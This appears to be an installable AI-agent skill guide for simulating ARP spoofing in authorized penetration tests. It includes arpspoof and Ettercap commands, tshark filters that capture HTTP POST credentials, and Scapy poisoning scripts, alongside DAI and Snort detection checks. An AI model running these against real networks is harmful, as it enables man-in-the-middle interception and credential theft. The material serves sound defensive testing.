npx skills add mukul975/Anthropic-Cybersecurity-SkillsMITRE ATT&CK
When to Use
- Testing whether network switches and infrastructure properly implement Dynamic ARP Inspection (DAI)
- Demonstrating man-in-the-middle attack risks to stakeholders during authorized security assessments
- Validating that network monitoring tools (IDS/IPS, SIEM) detect ARP cache poisoning attempts
- Assessing the effectiveness of port security, 802.1X, and VLAN segmentation controls
- Training SOC analysts to recognize ARP spoofing indicators in network traffic
Do not use on production networks without explicit written authorization and a rollback plan, against networks carrying critical or life-safety traffic, or as a denial-of-service attack vector.
Prerequisites
- Written authorization specifying in-scope network segments for ARP spoofing simulation
- Kali Linux or similar penetration testing distribution with arpspoof, Ettercap, and Scapy installed
- Direct Layer 2 access to the target network segment (same VLAN as target hosts)
- IP forwarding knowledge and ability to enable/disable packet forwarding on the attacker machine
- Wireshark or tcpdump for capturing traffic to verify interception
- Isolated lab environment or approved production test window
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
Workflow
Step 1: Enumerate the Target Network Segment
# Discover hosts on the local subnet
nmap -sn -PR 192.168.1.0/24 -oG arp_discovery.txt
# Identify the default gateway
ip route show default
# Output: default via 192.168.1.1 dev eth0
# Identify target hosts and their MAC addresses
arp-scan -l -I eth0
# Verify the current ARP table
arp -a
# Note the gateway IP (192.168.1.1) and target host IP (192.168.1.50)
# Record their legitimate MAC addresses for verification and cleanupStep 2: Enable IP Forwarding
# Enable IPv4 forwarding to relay packets between victim and gateway
sudo sysctl -w net.ipv4.ip_forward=1
# Verify forwarding is enabled
cat /proc/sys/net/ipv4/ip_forward
# Should output: 1
# Optionally prevent ICMP redirects that could alert the victim
sudo sysctl -w net.ipv4.conf.all.send_redirects=0
sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0Step 3: Execute ARP Spoofing with arpspoof
# Spoof the gateway to the target (tell target we are the gateway)
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1
# In a separate terminal, spoof the target to the gateway (bidirectional)
sudo arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.50
# Alternative: Use Ettercap for unified bidirectional spoofing
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//Step 4: Capture and Analyze Intercepted Traffic
# Capture all traffic flowing through the attacker machine
sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50
# Use tshark to capture HTTP credentials in real-time
sudo tshark -i eth0 -Y "http.request.method == POST" \
-T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value
# Capture DNS queries from the victim
sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50" \
-T fields -e frame.time -e dns.qry.name
# Use Ettercap with password collection filters
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1// \
-w ettercap_capture.pcapStep 5: Demonstrate Impact with Scapy (Custom ARP Packets)
#!/usr/bin/env python3
"""ARP spoofing demonstration using Scapy for authorized security testing."""
from scapy.all import Ether, ARP, sendp, srp, conf
import time
import sys
conf.verb = 0
def get_mac(ip, iface="eth0"):
"""Resolve IP to MAC address via ARP request."""
ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
timeout=2, iface=iface)
if ans:
return ans[0][1].hwsrc
return None
def spoof(target_ip, spoof_ip, target_mac, iface="eth0"):
"""Send spoofed ARP reply to target."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
sendp(Ether(dst=target_mac) / packet, iface=iface, verbose=False)
def restore(target_ip, gateway_ip, target_mac, gateway_mac, iface="eth0"):
"""Restore legitimate ARP entries."""
packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
psrc=gateway_ip, hwsrc=gateway_mac)
sendp(Ether(dst=target_mac) / packet, iface=iface, count=5, verbose=False)
if __name__ == "__main__":
target_ip = "192.168.1.50"
gateway_ip = "192.168.1.1"
iface = "eth0"
target_mac = get_mac(target_ip, iface)
gateway_mac = get_mac(gateway_ip, iface)
if not target_mac or not gateway_mac:
print("[!] Could not resolve MAC addresses. Exiting.")
sys.exit(1)
print(f"[*] Target: {target_ip} ({target_mac})")
print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
print("[*] Starting ARP spoofing... Press Ctrl+C to stop.")
try:
packets_sent = 0
while True:
spoof(target_ip, gateway_ip, target_mac, iface)
spoof(gateway_ip, target_ip, gateway_mac, iface)
packets_sent += 2
print(f"\r[*] Packets sent: {packets_sent}", end="")
time.sleep(1)
except KeyboardInterrupt:
print("\n[*] Restoring ARP tables...")
restore(target_ip, gateway_ip, target_mac, gateway_mac, iface)
restore(gateway_ip, target_ip, gateway_mac, target_mac, iface)
print("[*] ARP tables restored. Exiting.")Step 6: Verify Detection and Cleanup
# On the target machine, check for ARP cache poisoning indicators
arp -a | grep 192.168.1.1
# If spoofed, the gateway MAC will match the attacker's MAC
# Check IDS/SIEM for ARP spoofing alerts
# Snort rule that should trigger:
# alert arp any any -> any any (msg:"ARP Spoof Detected"; arp.opcode:2;
# threshold:type both, track by_src, count 30, seconds 10; sid:1000010;)
# Stop the attack and restore ARP tables
# Ctrl+C on arpspoof/ettercap sessions
# Disable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0
# Manually restore ARP entries on affected hosts (if needed)
# On target: arp -d 192.168.1.1 && ping -c 1 192.168.1.1
# On gateway: arp -d 192.168.1.50 && ping -c 1 192.168.1.50
# Verify legitimate MAC addresses are restored
arp -aKey Concepts
| Term | Definition |
|---|---|
| ARP Cache Poisoning | Technique of sending fraudulent ARP replies to associate the attacker's MAC address with another host's IP address in the target's ARP cache |
| Gratuitous ARP | ARP reply sent without a corresponding request, used by ARP spoofing tools to update a target's ARP cache with false entries |
| Dynamic ARP Inspection (DAI) | Switch-level security feature that validates ARP packets against the DHCP snooping binding database and drops invalid ARP traffic |
| IP Forwarding | Kernel-level setting that allows a host to relay packets between network interfaces, required for transparent man-in-the-middle interception |
| DHCP Snooping | Switch security feature that builds a trusted binding table of IP-to-MAC-to-port mappings, serving as the foundation for DAI validation |
Tools & Systems
- arpspoof (dsniff suite): Simple command-line tool that sends continuous spoofed ARP replies to redirect traffic between two targets
- Ettercap: Comprehensive suite for man-in-the-middle attacks supporting ARP spoofing, DNS spoofing, content filtering, and credential capture
- Scapy: Python packet manipulation library for crafting custom ARP packets with full control over all header fields
- arp-scan: Network scanning tool that sends ARP requests to discover all hosts on a local network segment
- Wireshark: Packet analyzer for verifying ARP spoofing success and capturing intercepted traffic for analysis
Common Scenarios
Scenario: Testing Dynamic ARP Inspection Effectiveness on Enterprise Switches
Context: A network team deployed Cisco DAI on all access-layer switches and needs to validate that ARP spoofing attempts are properly detected and blocked. The test is authorized on a dedicated VLAN (VLAN 100) with three test hosts and one attacker machine connected to the same switch.
Approach:
- Document baseline ARP tables on all hosts and the legitimate MAC-IP bindings in the DHCP snooping database
- Run arpspoof from the attacker machine targeting the default gateway and a test workstation
- Verify that the switch drops spoofed ARP packets by checking DAI statistics:
show ip arp inspection statistics vlan 100 - Confirm the test workstation's ARP cache still shows the legitimate gateway MAC address
- Temporarily disable DAI on the test VLAN and repeat the attack to confirm it succeeds without the control
- Re-enable DAI and document results showing the control is effective
- Verify that IDS alerts were generated for both the blocked and unblocked attack attempts
Pitfalls:
- Running ARP spoofing on a VLAN without DAI and accidentally disrupting legitimate traffic
- Forgetting to enable IP forwarding, causing a denial-of-service instead of transparent interception
- Not restoring ARP tables after testing, leaving hosts with stale cache entries
- Testing on a trunk port instead of an access port, potentially affecting multiple VLANs
Output Format
## ARP Spoofing Simulation Report
**Test ID**: NET-ARP-001
**Date**: 2024-03-15 14:00-15:00 UTC
**Target VLAN**: VLAN 100 (192.168.1.0/24)
**Attacker**: 192.168.1.99 (AA:BB:CC:DD:EE:FF)
**Target**: 192.168.1.50 (00:11:22:33:44:55)
**Gateway**: 192.168.1.1 (00:AA:BB:CC:DD:01)
### Test Results
| Test | DAI Status | ARP Spoof Result | Traffic Intercepted |
|------|------------|-------------------|---------------------|
| Test 1 | Enabled | Blocked (switch dropped 847 packets) | No |
| Test 2 | Disabled | Successful (target ARP cache poisoned) | Yes - 23 HTTP sessions |
| Test 3 | Re-enabled | Blocked | No |
### Detection Coverage
- DAI: PASS - Dropped all spoofed ARP replies when enabled
- IDS (Snort): PASS - Generated alert SID:1000010 within 15 seconds
- SIEM: PASS - Alert correlated and escalated within 2 minutes
### Recommendations
1. Maintain DAI enabled on all access VLANs (currently disabled on VLANs 200, 210)
2. Enable DHCP snooping rate limiting to prevent DHCP starvation attacks
3. Deploy 802.1X port authentication to complement ARP inspectionReferences and resources
Everything below is rendered for inspection. Script files are read-only and never run.
References 1
api-reference.md2.5 KB
API Reference: Performing ARP Spoofing Attack Simulation
Scapy Library (Core)
| Function/Class | Description |
|---|---|
ARP(op="is-at", psrc=ip, hwsrc=mac) |
Construct ARP reply (poison) packet |
Ether(dst=mac) |
Construct Ethernet frame with target MAC |
srp(packet, timeout, iface) |
Send and receive layer 2 packets (ARP resolution) |
sendp(packet, iface) |
Send packet at layer 2 without waiting for reply |
get_if_hwaddr(iface) |
Get MAC address of local interface |
get_if_list() |
List available network interfaces |
conf.iface |
Get/set default network interface |
ARP Packet Fields
| Field | Description |
|---|---|
op |
Operation: "who-has" (request) or "is-at" (reply) |
psrc |
Source protocol (IP) address |
pdst |
Destination protocol (IP) address |
hwsrc |
Source hardware (MAC) address |
hwdst |
Destination hardware (MAC) address |
Detection Verification Commands
| Command | Platform | Description |
|---|---|---|
show ip arp inspection statistics |
Cisco IOS | DAI statistics and violations |
show ip arp inspection log |
Cisco IOS | DAI violation log entries |
arpwatch -i eth0 |
Linux | Monitor ARP table changes |
ip neigh show |
Linux | Display current ARP cache |
Key Libraries
- scapy (
pip install scapy): Packet crafting and network interaction - netifaces: Cross-platform network interface information
- nmap (python-nmap): Network host discovery as alternative to ARP scan
Configuration
| Variable | Description |
|---|---|
| Interface | Network interface on same VLAN as target (e.g., eth0) |
| Root/Admin | Scapy requires root/administrator privileges for raw sockets |
Safety Controls
| Control | Purpose |
|---|---|
| Written authorization | Legal requirement before any ARP spoofing |
restore_arp() |
Always restore legitimate ARP entries after simulation |
| Packet count limit | Limit spoofing rounds to minimum needed for detection test |
| Isolated VLAN | Run simulation on isolated test network segment |
References
Scripts 1
agent.py6.2 KB
#!/usr/bin/env python3
# For authorized penetration testing and educational environments only.
# Usage against targets without prior mutual consent is illegal.
# It is the end user's responsibility to obey all applicable local, state and federal laws.
"""
ARP Spoofing Attack Simulation Agent — AUTHORIZED TESTING ONLY
Simulates ARP spoofing attacks using Scapy in controlled lab environments
to test network detection capabilities and validate DAI countermeasures.
WARNING: Only use with explicit written authorization on isolated test networks.
"""
import sys
import time
from datetime import datetime, timezone
from scapy.all import ARP, Ether, sendp, srp, get_if_hwaddr
def get_mac(ip: str, iface: str) -> str:
"""Resolve MAC address for a given IP using ARP request."""
ans, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
timeout=3, verbose=False, iface=iface,
)
if ans:
return ans[0][1].hwsrc
return None
def scan_network(network_cidr: str, iface: str) -> list[dict]:
"""Scan local network segment to discover active hosts."""
ans, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network_cidr),
timeout=5, verbose=False, iface=iface,
)
hosts = []
for sent, received in ans:
hosts.append({
"ip": received.psrc,
"mac": received.hwsrc,
"responded": True,
})
return hosts
def craft_arp_poison_packets(
target_ip: str, target_mac: str,
gateway_ip: str, gateway_mac: str,
attacker_mac: str,
) -> tuple:
"""Craft ARP poison packets for target and gateway."""
target_packet = Ether(dst=target_mac) / ARP(
op="is-at",
psrc=gateway_ip,
hwsrc=attacker_mac,
pdst=target_ip,
hwdst=target_mac,
)
gateway_packet = Ether(dst=gateway_mac) / ARP(
op="is-at",
psrc=target_ip,
hwsrc=attacker_mac,
pdst=gateway_ip,
hwdst=gateway_mac,
)
return target_packet, gateway_packet
def send_arp_poison(
target_pkt, gateway_pkt, iface: str, count: int = 5, interval: float = 2.0
) -> dict:
"""Send ARP poison packets and log the activity."""
results = {"packets_sent": 0, "start_time": "", "end_time": ""}
results["start_time"] = datetime.now(timezone.utc).isoformat()
for i in range(count):
sendp(target_pkt, iface=iface, verbose=False)
sendp(gateway_pkt, iface=iface, verbose=False)
results["packets_sent"] += 2
if i < count - 1:
time.sleep(interval)
results["end_time"] = datetime.now(timezone.utc).isoformat()
return results
def restore_arp(
target_ip: str, target_mac: str,
gateway_ip: str, gateway_mac: str,
iface: str,
) -> None:
"""Restore legitimate ARP entries to undo spoofing."""
restore_target = Ether(dst=target_mac) / ARP(
op="is-at",
psrc=gateway_ip,
hwsrc=gateway_mac,
pdst=target_ip,
hwdst=target_mac,
)
restore_gateway = Ether(dst=gateway_mac) / ARP(
op="is-at",
psrc=target_ip,
hwsrc=target_mac,
pdst=gateway_ip,
hwdst=gateway_mac,
)
for _ in range(5):
sendp(restore_target, iface=iface, verbose=False)
sendp(restore_gateway, iface=iface, verbose=False)
time.sleep(0.5)
def verify_detection(expected_alerts: list[str]) -> dict:
"""Verify that security controls detected the ARP spoofing attempt."""
return {
"expected_detections": expected_alerts,
"note": "Check IDS/IPS alerts, SIEM events, and switch DAI logs for ARP anomaly detections",
"check_commands": [
"show ip arp inspection statistics # Cisco switch DAI",
"show ip arp inspection log # DAI violation log",
"grep 'arp' /var/log/snort/alert # Snort ARP alerts",
],
}
def generate_report(
hosts: list, target_ip: str, gateway_ip: str,
send_results: dict, detection: dict,
) -> str:
"""Generate ARP spoofing simulation report."""
lines = [
"ARP SPOOFING ATTACK SIMULATION REPORT — AUTHORIZED TESTING ONLY",
"=" * 65,
f"Date: {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')}",
"",
f"Network Hosts Discovered: {len(hosts)}",
f"Target: {target_ip}",
f"Gateway: {gateway_ip}",
"",
"SIMULATION RESULTS:",
f" Packets Sent: {send_results['packets_sent']}",
f" Start: {send_results['start_time']}",
f" End: {send_results['end_time']}",
"",
"DETECTION VERIFICATION:",
]
for cmd in detection["check_commands"]:
lines.append(f" $ {cmd}")
return "\n".join(lines)
if __name__ == "__main__":
print("[!] ARP SPOOFING SIMULATION — AUTHORIZED TESTING ONLY")
print("[!] Ensure you have written authorization before proceeding.\n")
if len(sys.argv) < 4:
print(f"Usage: {sys.argv[0]} <target_ip> <gateway_ip> <interface>")
print(f" Example: {sys.argv[0]} 192.168.1.100 192.168.1.1 eth0")
sys.exit(1)
target_ip = sys.argv[1]
gateway_ip = sys.argv[2]
iface = sys.argv[3]
count = int(sys.argv[4]) if len(sys.argv) > 4 else 5
print(f"[*] Resolving MAC addresses on {iface}...")
target_mac = get_mac(target_ip, iface)
gateway_mac = get_mac(gateway_ip, iface)
attacker_mac = get_if_hwaddr(iface)
if not target_mac or not gateway_mac:
print("[!] Could not resolve MAC addresses. Ensure hosts are reachable.")
sys.exit(1)
print(f"[*] Target: {target_ip} ({target_mac})")
print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
print(f"[*] Attacker: {attacker_mac}")
target_pkt, gw_pkt = craft_arp_poison_packets(
target_ip, target_mac, gateway_ip, gateway_mac, attacker_mac
)
print(f"[*] Sending {count} ARP poison rounds...")
results = send_arp_poison(target_pkt, gw_pkt, iface, count=count)
print("[*] Restoring ARP tables...")
restore_arp(target_ip, target_mac, gateway_ip, gateway_mac, iface)
detection = verify_detection(["DAI violation", "ARP anomaly IDS alert", "SIEM ARP event"])
report = generate_report([], target_ip, gateway_ip, results, detection)
print(report)